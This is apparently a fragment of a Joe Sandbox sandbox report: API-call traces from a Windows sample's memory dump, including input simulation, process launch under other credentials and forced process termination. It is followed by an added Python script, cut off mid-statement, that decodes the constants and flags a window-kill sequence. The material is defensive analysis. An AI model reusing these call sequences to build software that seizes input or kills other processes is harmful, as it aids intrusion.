                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000004), ref: 00F2E4A1
                                                                                                                                                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 00F2E4C5
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F2E4E8
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 642888154-0
                                                                                                                                                                                                                                                      • Opcode ID: 0b4544800ca22748e1ac33a63e88f17a23b1a32caf3a844038382a0e4ca1adc3
                                                                                                                                                                                                                                                      • Instruction ID: 328e867519c3a5eb844cf5de1a4a40dc035d3a32c7a3a64a51fae60e59278e1a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0b4544800ca22748e1ac33a63e88f17a23b1a32caf3a844038382a0e4ca1adc3
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC418338A01154EFDB22DF24D499F947BF1BF19324F2841B9EA588F2A2C735E841EB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 00F098D1
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: std::exception::exception.LIBCMT ref: 00EDF51E
                                                                                                                                                                                                                                                        • Part of subcall function 00EDF4EA: __CxxThrowException@8.LIBCMT ref: 00EDF533
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00F09908
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00F09924
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00F0999E
                                                                                                                                                                                                                                                      • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F099B3
                                                                                                                                                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F099D2
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2537439066-0
                                                                                                                                                                                                                                                      • Opcode ID: 954c60c498cefb59453407a3b08bd9e83f8cc566e3f3fe5471c77679b0dbccfc
                                                                                                                                                                                                                                                      • Instruction ID: 59a3ecdd90a7a5baa1c46bd1b329e65e6f318999fedbe9bb277aabb1388c34a7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c60c498cefb59453407a3b08bd9e83f8cc566e3f3fe5471c77679b0dbccfc
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AD316171A00109ABDB10EF94DC85E6EB7B8FF85710B1480A9FD05AB286D774DE11EBA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00F177F4,?,?,00000000,00000001), ref: 00F19B53
                                                                                                                                                                                                                                                        • Part of subcall function 00F16544: GetWindowRect.USER32(?,?), ref: 00F16557
                                                                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00F19B7D
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 00F19B84
                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F19BB6
                                                                                                                                                                                                                                                        • Part of subcall function 00F07A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F07AD0
                                                                                                                                                                                                                                                      • GetCursorPos.USER32(?), ref: 00F19BE2
                                                                                                                                                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F19C44
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4137160315-0
                                                                                                                                                                                                                                                      • Opcode ID: 73906bc4db928c0f6cb08c03ac136af5581d9e9087c144e4557dfa342375575c
                                                                                                                                                                                                                                                      • Instruction ID: dbc455fa9357721c37b133cbd9e8248df0477554b4237cd46e6b90ac3d062a0c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73906bc4db928c0f6cb08c03ac136af5581d9e9087c144e4557dfa342375575c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F831F072608309ABC710DF14DC49F9BB7E9FF89314F00092AF985D7191DA70EA44DB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00EFAFAE
• OpenProcessToken.ADVAPI32(00000000), ref: 00EFAFB5
• CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00EFAFC4
• CloseHandle.KERNEL32(00000004), ref: 00EFAFCF
• CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EFAFFE
• DestroyEnvironmentBlock.USERENV(00000000), ref: 00EFB012
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
• String ID:
• API String ID: 1413079979-0
• Opcode ID: 865a22725b911741e33f52280311e292de76e1245897ebb88e8190cdbadee81b
• Instruction ID: ebc605d7afd3c7e1de36de509847e8af16b351bc3ac67dc9c46e8baa10b12a8e
• Opcode Fuzzy Hash: 865a22725b911741e33f52280311e292de76e1245897ebb88e8190cdbadee81b
• Instruction Fuzzy Hash: A9214FB220020DABDF128F94DD49FEE7BA9AB45308F085025FE05AA161D3759D61EB61
APIs
  • Part of subcall function 00EDAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EDAFE3
  • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDAFF2
  • Part of subcall function 00EDAF83: BeginPath.GDI32(?), ref: 00EDB009
  • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDB033
• MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F2EC20
• LineTo.GDI32(00000000,00000003,?), ref: 00F2EC34
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F2EC42
• LineTo.GDI32(00000000,00000000,?), ref: 00F2EC52
• EndPath.GDI32(00000000), ref: 00F2EC62
• StrokePath.GDI32(00000000), ref: 00F2EC72
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Path$LineMoveObjectSelect$BeginCreateStroke
• String ID:
• API String ID: 43455801-0
• Opcode ID: 4576ea922ce8b03a0476f663877ad4d6d1894b2500535077d22831add9255211
• Instruction ID: 5d5090283aa13ccf878be44841b1f43dd0f9467b9391c0c9b9f929a5788b2dc9
• Opcode Fuzzy Hash: 4576ea922ce8b03a0476f663877ad4d6d1894b2500535077d22831add9255211
• Instruction Fuzzy Hash: B6115B7600014CBFEF029F94DC88EEA7F6DEF09360F148122BE088A160D7719D56EBA0
APIs
• GetDC.USER32(00000000), ref: 00EFE1C0
• GetDeviceCaps.GDI32(00000000,00000058), ref: 00EFE1D1
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EFE1D8
• ReleaseDC.USER32(00000000,00000000), ref: 00EFE1E0
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 00EFE1F7
• MulDiv.KERNEL32(000009EC,?,?), ref: 00EFE209
  • Part of subcall function 00EF9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00EF9A05,00000000,00000000,?,00EF9DDB), ref: 00EFA53A
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CapsDevice$ExceptionRaiseRelease
• String ID:
• API String ID: 603618608-0
• Opcode ID: 1b66708dc2784a8aab89592c9adcd268ecaa224631735c2b45303095a628b783
• Instruction ID: 77f871acf1ddeab4d0d238bc869852baf65fa3fc21ca7ca13104012e50ef518e
• Opcode Fuzzy Hash: 1b66708dc2784a8aab89592c9adcd268ecaa224631735c2b45303095a628b783
• Instruction Fuzzy Hash: 49018FB9A00618BFEB109BA68C45B5EBFB8EB59751F004066EE04AB391D6709C00CBA0
APIs
• __init_pointers.LIBCMT ref: 00EE7B47
  • Part of subcall function 00EE123A: __initp_misc_winsig.LIBCMT ref: 00EE125E
  • Part of subcall function 00EE123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EE7F51
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EE7F65
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EE7F78
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EE7F8B
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EE7F9E
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EE7FB1
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EE7FC4
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EE7FD7
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EE7FEA
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EE7FFD
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EE8010
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EE8023
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EE8036
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EE8049
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EE805C
  • Part of subcall function 00EE123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00EE806F
• __mtinitlocks.LIBCMT ref: 00EE7B4C
  • Part of subcall function 00EE7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00F7AC68,00000FA0,?,?,00EE7B51,00EE5E77,00F76C70,00000014), ref: 00EE7E41
• __mtterm.LIBCMT ref: 00EE7B55
  • Part of subcall function 00EE7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00EE7B5A,00EE5E77,00F76C70,00000014), ref: 00EE7D3F
  • Part of subcall function 00EE7BBD: _free.LIBCMT ref: 00EE7D46
  • Part of subcall function 00EE7BBD: DeleteCriticalSection.KERNEL32(00F7AC68,?,?,00EE7B5A,00EE5E77,00F76C70,00000014), ref: 00EE7D68
• __calloc_crt.LIBCMT ref: 00EE7B7A
• GetCurrentThreadId.KERNEL32 ref: 00EE7BA3
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2942034483-0
                                                                                                                                                                                                                                                      • Opcode ID: f42178a6569c4e41e8d6575a0f33fcbe54efbe34121bd6cfd7609f12d03de861
                                                                                                                                                                                                                                                      • Instruction ID: 836e7c7185d4e2bc4b2d7e59a5c335591fdba9a9383f8d1d09a7aadbe81a20a1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f42178a6569c4e41e8d6575a0f33fcbe54efbe34121bd6cfd7609f12d03de861
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08F0903212D7DE19E72877767C06A4B3BD69F02734B2026A9F8E4F91E2FF2188425161
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EC281D
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EC2825
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EC2830
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EC283B
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EC2843
                                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC284B
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                                      • Opcode ID: e49b22e6fb6f865a8ed767e9d8fed79c395f728310c80caf05e239cde914b0bb
                                                                                                                                                                                                                                                      • Instruction ID: 980ebff544b672fccc86b31dd47989ff33c2e9309cb39416baa0e144687892b3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e49b22e6fb6f865a8ed767e9d8fed79c395f728310c80caf05e239cde914b0bb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 360167B0902B5EBDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1423608774-0
                                                                                                                                                                                                                                                      • Opcode ID: 55851aeac2898515a78f0c06c15a92cc24ef2c23970707ba06c9ef7a22d4139e
                                                                                                                                                                                                                                                      • Instruction ID: 5d8b3697f9f9f8d73b1cfafb27af17a14e12d34957bbbd59c35651b3f443c038
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 55851aeac2898515a78f0c06c15a92cc24ef2c23970707ba06c9ef7a22d4139e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C701A436706215ABE7252F58EC58DEB77A9FF99711B040529F903920E1EBF89900FB50
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F07C07
                                                                                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F07C1D
                                                                                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 00F07C2C
                                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C3B
                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C45
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C4C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 839392675-0
                                                                                                                                                                                                                                                      • Opcode ID: 7631a746e0c8362e1080530258d65389922c92cfc3e222d26525b58bc4622bb9
                                                                                                                                                                                                                                                      • Instruction ID: 3adf63f3b62508a19e8fb3fa7169fa442280bcd8629cd2712a636327b7051212
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7631a746e0c8362e1080530258d65389922c92cfc3e222d26525b58bc4622bb9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 68F03A7A64215CBBE7215B529C0EEEF7B7CEFD7B11F000058FE0591091D7A06A81E6B5
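The two "APIs" listings above (the MapVirtualKeyW block at 00EC281D-00EC284B and the PostMessageW / OpenProcess / TerminateProcess block at 00F07C07-00F07C4C) are raw stack dumps with undecoded constants. The Python below is an added example, not part of the Joe Sandbox report: it parses lines in this report's "APIs" format, resolves the Win32 constants that are certain from the values (0x10 = WM_CLOSE, 0x1F0FFF = PROCESS_ALL_ACCESS, 0x2 = SMTO_ABORTIFHUNG, 0x1F4 = 500 ms, and the VK_* codes 0x5B/0x10/0xA0/0xA1/0x11/0x12), and flags the close-then-terminate sequence. The sample input is copied from the listings on this page; the pattern names ("window kill", "modifier scan-code init") are my interpretation of the call sequence, not labels from the report.

```python
"""Decode Joe Sandbox "APIs" listings and flag a window-kill sequence.

Added example (not from the report): parses lines of the form
    • Api.MODULE(arg,arg,...), ref: ADDR
resolves the raw hex constants, and checks for the close-then-terminate pattern.
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: the two "APIs" listings from this report, verbatim.
WINKILL_LISTING = """\
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F07C07
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F07C1D
• GetWindowThreadProcessId.USER32(?,?), ref: 00F07C2C
• OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C3B
• TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C45
• CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F07C4C
"""
KEYMAP_LISTING = """\
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EC281D
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00EC2825
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EC2830
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EC283B
• MapVirtualKeyW.USER32(00000011,00000000), ref: 00EC2843
• MapVirtualKeyW.USER32(00000012,00000000), ref: 00EC284B
"""

# Win32 constants the report leaves as raw hex.
WM_CLOSE = 0x0010
PROCESS_ALL_ACCESS = 0x001F0FFF
SMTO_ABORTIFHUNG = 0x0002
MAPVK_VK_TO_VSC = 0
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

# One bullet line; "_free.LIBCMT ref: ..." has no parentheses and no comma.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                      # int for hex literals, None for "?" (non-constant)
    ref: int                        # address of the call site
    subcall_of: Optional[str] = None


def parse_listing(text: str) -> list[ApiCall]:
    """Parse the bullet lines of an "APIs" block; other report lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [None if a.strip() == "?" else int(a, 16)
                for a in raw.split(",") if a.strip()]
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
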